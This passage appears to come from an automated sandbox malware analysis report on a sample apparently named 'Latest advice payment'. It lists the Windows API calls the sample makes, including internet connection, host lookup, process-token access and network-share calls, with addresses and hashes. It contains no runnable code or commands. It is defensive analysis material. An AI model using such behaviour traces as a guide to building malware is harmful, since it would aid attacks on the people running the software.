                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 0b70b25eff2d43fd305585755732512e5a3954c539213c988683aa373bbcd00a
                                                            • Instruction ID: 28171aba25a3d53c8f894270f14fd0aa893c84ee72d951b7df0e51daffd12749
                                                            • Opcode Fuzzy Hash: 0b70b25eff2d43fd305585755732512e5a3954c539213c988683aa373bbcd00a
                                                            • Instruction Fuzzy Hash: 91216972E01109EBDB14DFA8C949BFEBBB8FF65344F158059E844AB241DB31AE05DB90
                                                            APIs
                                                            • __setmode.LIBCMT ref: 005809AE
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            • _fprintf.LIBCMT ref: 005809E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 005B5DBB
                                                              • Part of subcall function 00584AAA: _flsall.LIBCMT ref: 00584AC3
                                                            • __setmode.LIBCMT ref: 00580A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: b1e4df6a8500dadc945d16c316173fc89007e22dc96c3715d3d108e11733e93e
                                                            • Instruction ID: f5963e201cdf3beb77adf8136975db7ca5ee6ea068689eb97a2fccf22559f28e
                                                            • Opcode Fuzzy Hash: b1e4df6a8500dadc945d16c316173fc89007e22dc96c3715d3d108e11733e93e
                                                            • Instruction Fuzzy Hash: EB110231904647AFDB08B2F49C4E9BE7FA8BFC1320F240119FA05671C2FE3159469BA1
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D17A3
                                                              • Part of subcall function 005D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D184C
                                                              • Part of subcall function 005D182D: InternetCloseHandle.WININET(00000000), ref: 005D18E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 22089703d38500c4e5c2dfbf35859c7bc6bc52d27d3dbdced96c91750f7ab7e4
                                                            • Instruction ID: 2690e36493b384ad5b2dd94a7a0ddcad119aeac9f2c99e0e6adcd143f8af446b
                                                            • Opcode Fuzzy Hash: 22089703d38500c4e5c2dfbf35859c7bc6bc52d27d3dbdced96c91750f7ab7e4
                                                            • Instruction Fuzzy Hash: 8F21F631200A01BFEB269F68DC40FBABFA9FF98710F10442BF9519A750DB71D810A7A4
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,005EFAC0), ref: 005C3A64
                                                            • GetLastError.KERNEL32 ref: 005C3A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 005C3A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005EFAC0), ref: 005C3ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: f0901d15f4d6c3fd518b2ba7a25eb4adecd6314580353ea6a71b6a60d10aded9
                                                            • Instruction ID: adbdce5e9743cd81410213f9dc7764a68ea1d4b3a405d581ecf1913eab2ca328
                                                            • Opcode Fuzzy Hash: f0901d15f4d6c3fd518b2ba7a25eb4adecd6314580353ea6a71b6a60d10aded9
                                                            • Instruction Fuzzy Hash: 972194745082099F8310DF64CC85D6A7FE4BE59368F148A2DF4D9C72A1DB31DE59CB82
                                                            APIs
                                                            • _free.LIBCMT ref: 00595101
                                                              • Part of subcall function 0058571C: __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058571C: __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058571C: RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7fbec0713f8b8a58c3ca44b3ac42801622871795eac2f225e418e27793149e17
                                                            • Instruction ID: 99cd53071c81327d7c98a41610dd396b105b553c0ae81a5a157123b84811a29a
                                                            • Opcode Fuzzy Hash: 7fbec0713f8b8a58c3ca44b3ac42801622871795eac2f225e418e27793149e17
                                                            • Instruction Fuzzy Hash: E411A372901A16AECF323F74AC4976D3F98BB943A1B104929FD85AA250EF348951E790
                                                            APIs
                                                            • _memset.LIBCMT ref: 005644CF
                                                              • Part of subcall function 0056407C: _memset.LIBCMT ref: 005640FC
                                                              • Part of subcall function 0056407C: _wcscpy.LIBCMT ref: 00564150
                                                              • Part of subcall function 0056407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00564160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00564524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00564533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0059D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: c3b2aaa966f3372d93b266045c961a3c0b62ef20b5640d897fd47bf544125fcc
                                                            • Instruction ID: d8bb3b9c324e76416be5e9cf1eaf6d61ea3dd56202ed862c6c5a40fc1ccda20e
                                                            • Opcode Fuzzy Hash: c3b2aaa966f3372d93b266045c961a3c0b62ef20b5640d897fd47bf544125fcc
                                                            • Instruction Fuzzy Hash: 3121F5705047849FEB328B248849BE7BFECBB11314F04049DE68E5B181C7B42A84CB51
                                                            APIs
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 005D6399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D63A4
                                                            • _memmove.LIBCMT ref: 005D63D1
                                                            • inet_ntoa.WSOCK32(?), ref: 005D63DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 3c8574c9aa961aa871b2a573de4d32775aeab953b7b9795f3756cb3df5ec99ed
                                                            • Instruction ID: 55c34b8253d10dbcf6feaed502784319b2f97a4716c91eaefc603568d0709b5d
                                                            • Opcode Fuzzy Hash: 3c8574c9aa961aa871b2a573de4d32775aeab953b7b9795f3756cb3df5ec99ed
                                                            • Instruction Fuzzy Hash: 34112E7150010AAFCB14FBA4DD8ACEEBBB8BF98310B544466F545A7261EF30AE14DB61
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005B8B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: a82a88c7a996d77c2902a626bf6b1b82346b8d9054a0b00aefd817073ae248af
                                                            • Instruction ID: 25ae02dbad5641cbbd1f85c49181fb5f1ef09452b5034ccb27884443979fe263
                                                            • Opcode Fuzzy Hash: a82a88c7a996d77c2902a626bf6b1b82346b8d9054a0b00aefd817073ae248af
                                                            • Instruction Fuzzy Hash: DE110A79901218FFDB11DBA5C885EADBB78FB48710F204095E900B7250DA716E11DB94
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 005612D8
                                                            • GetClientRect.USER32(?,?), ref: 0059B5FB
                                                            • GetCursorPos.USER32(?), ref: 0059B605
                                                            • ScreenToClient.USER32(?,?), ref: 0059B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: d519925238a8b46827841ec254f117be45da5c8bbc114074bf35700eb848928f
                                                            • Instruction ID: d9eda76c8b5369bcf74873c5b623a3150553dba141bc4d9d0a9c8360ebf9a11d
                                                            • Opcode Fuzzy Hash: d519925238a8b46827841ec254f117be45da5c8bbc114074bf35700eb848928f
                                                            • Instruction Fuzzy Hash: B411583990085AABCF14EFA9D8999BE7BB8FB55300F000456FA41E7140CB30BA559BA9
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 005BD84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005BD864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005BD879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005BD897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 48bd572023f5af31604dbaf8d1883cf48042d03469b7296bfe0c29ef68d3364c
                                                            • Instruction ID: 2f86bf682b61ebe25fa884ea2302b5e1238567e3464eedf0040036291e7c8547
                                                            • Opcode Fuzzy Hash: 48bd572023f5af31604dbaf8d1883cf48042d03469b7296bfe0c29ef68d3364c
                                                            • Instruction Fuzzy Hash: 49115E75605704DBE7208F50DC48F92BBBCFB00B01F108969B556D6090E7B1F549ABB1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: c1513926805207c4aee602827649126191c372e1cec41902333f78df2459e5ac
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: AC01397245814EBBCF165E84CC4A8EE3F62FB1C350B598416FA1858031D336D9B1AF81
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 005EB2E4
                                                            • ScreenToClient.USER32(?,?), ref: 005EB2FC
                                                            • ScreenToClient.USER32(?,?), ref: 005EB320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005EB33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: d4582e74272388233bca7847553052651aabf1e95eca7d985183c6d3a723be79
                                                            • Instruction ID: 0d9c07b5a388f6894c281fcb02dcc915889cbccde32f54337dc9c8644f634835
                                                            • Opcode Fuzzy Hash: d4582e74272388233bca7847553052651aabf1e95eca7d985183c6d3a723be79
                                                            • Instruction Fuzzy Hash: 931174B9D00249EFDB01CFA9C8849EEBBF9FF18310F108166E954E3220D731AA559F51
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 005C6BE6
                                                              • Part of subcall function 005C76C4: _memset.LIBCMT ref: 005C76F9
                                                            • _memmove.LIBCMT ref: 005C6C09
                                                            • _memset.LIBCMT ref: 005C6C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005C6C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 9904229e0b1aacd39a0595af5a05c62040e554dff8c2f2e42d90187385f59d63
                                                            • Instruction ID: 71c3fea9580d19f2df0dad4e5a0e6d79eafceb6c962fdae7076e1198bcac705e
                                                            • Opcode Fuzzy Hash: 9904229e0b1aacd39a0595af5a05c62040e554dff8c2f2e42d90187385f59d63
                                                            • Instruction Fuzzy Hash: 13F0303A100100ABCF456F95DC89E4ABF69FF85320F048065FE086E266DB31A915DBB4
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00562231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0056223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00562250
                                                            • GetStockObject.GDI32(00000005), ref: 00562258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0059BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0059BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0059BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0059BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0059BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 0059BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 585f949a36ad9f1cd85fbc173caa747792c1004e3e7fda3f7f7e3eab26bae0ae
                                                            • Instruction ID: eb4094204797b188d72077e83758b0f92f78be7ca9b320d51926accf93428cea
                                                            • Opcode Fuzzy Hash: 585f949a36ad9f1cd85fbc173caa747792c1004e3e7fda3f7f7e3eab26bae0ae
                                                            • Instruction Fuzzy Hash: ECE06531504284EAFF295F64FC4D7D83F15EB25332F008366FAA94C0E18B714584EB12
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 005B871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,005B82E6), ref: 005B8722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005B82E6), ref: 005B872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,005B82E6), ref: 005B8736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 75325ee14a18b3193db9b1810862f6cb0990975f8c46b484e0a8d2260f2106d4
                                                            • Instruction ID: c7cb5265fff4ffadf44a22b6ff1b5c8aeac9e73a160801d24cb1236da69490a8
                                                            • Opcode Fuzzy Hash: 75325ee14a18b3193db9b1810862f6cb0990975f8c46b484e0a8d2260f2106d4
                                                            • Instruction Fuzzy Hash: 78E086366122529BDB209FB06D4CB963BACEF64796F158828B2C6CD040DE349449D750
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %_
                                                            • API String ID: 0-4145416222
                                                            • Opcode ID: fc309c277fe4bb87f023443fa6ab4cd366c31c3014397bd4d0095ccfcb08672b
                                                            • Instruction ID: 9c6a7793485a47c5a7c742667ba59ae19c6fadd2264d93e42c9e41cef3fe9340
                                                            • Opcode Fuzzy Hash: fc309c277fe4bb87f023443fa6ab4cd366c31c3014397bd4d0095ccfcb08672b
                                                            • Instruction Fuzzy Hash: 84B1C57590010ADBCF14EF94C8959FEBFB9FF98314F104526E902A7291EB349E85CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbb$xbb
                                                            • API String ID: 3653519197-1709228958
                                                            • Opcode ID: 37f2693f7eb578d4a198e6ba7b705300a2dc9ccb9ce708ad2bedc32cc41f555a
                                                            • Instruction ID: e8c20a55522fc8efb7b7b0f7224918db5adc766f4a94dbff5a06894978ada5a6
                                                            • Opcode Fuzzy Hash: 37f2693f7eb578d4a198e6ba7b705300a2dc9ccb9ce708ad2bedc32cc41f555a
                                                            • Instruction Fuzzy Hash: 5DB16F75A0010AEBDB24DF98C895EBABFBAFF58300F14845AF9459B351EB30D941CB50
                                                            APIs
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • __wcsnicmp.LIBCMT ref: 005CB02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 005CB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
